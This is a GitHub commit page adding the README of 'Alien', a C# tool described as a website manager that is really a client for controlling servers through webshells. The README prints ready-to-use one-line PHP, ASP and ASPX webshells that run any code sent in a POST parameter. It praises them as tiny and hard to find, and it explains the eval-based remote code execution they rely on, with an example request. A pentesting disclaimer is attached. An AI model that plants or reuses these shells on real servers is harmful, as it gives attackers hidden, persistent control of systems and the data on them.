-
Notifications
You must be signed in to change notification settings - Fork 11
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
5 changed files
with
46 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,46 @@ | ||
# Alien | ||
|
||
Website Manager | ||
|
||
## Disclaimer | ||
This tool only use in legal pentest, reasearch and website management\ | ||
You should take the consequence if you use in illegal purpose. | ||
|
||
## Language | ||
C# .NET Framework V4.8 | ||
|
||
## OneShell | ||
OneShell is a tool use in pentesting for control the server.\ | ||
It can be very tiny and very difficult to be found. | ||
These are the simplest oneshell. | ||
|
||
- PHP | ||
```<?php @eval($_POST['password']);?>``` | ||
- ASP | ||
```<%execute(request("password"))%>``` | ||
- ASPX | ||
```<%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>``` | ||
|
||
Also, Alien support asmx , ashx webshell | ||
|
||
## Server Manager | ||
- MySQL : PHP | ||
- Access : https://github.com/malbuffer4pt/DBer | ||
- SQL Server : ASP ASPX ASMX ASHX | ||
|
||
## Principle | ||
For PHP, eval() function can evaluate the string as a code.\ | ||
if eval() contains a controllable variable, then we can execute any code we like.\ | ||
Example: eval($_POST['a']);\ | ||
HTTP POST a=phpinfo();\ | ||
The the server will execute code "phpinfo();" | ||
|
||
## Screenshot | ||
|
||
![1](https://github.com/malbuffer4pt/WebBus/blob/main/1.png) | ||
![2](https://github.com/malbuffer4pt/WebBus/blob/main/2.png) | ||
![3](https://github.com/malbuffer4pt/WebBus/blob/main/3.png) | ||
![4](https://github.com/malbuffer4pt/WebBus/blob/main/4.png) | ||
|
||
## Acknowledgements | ||
Every veteran who study in webshell. |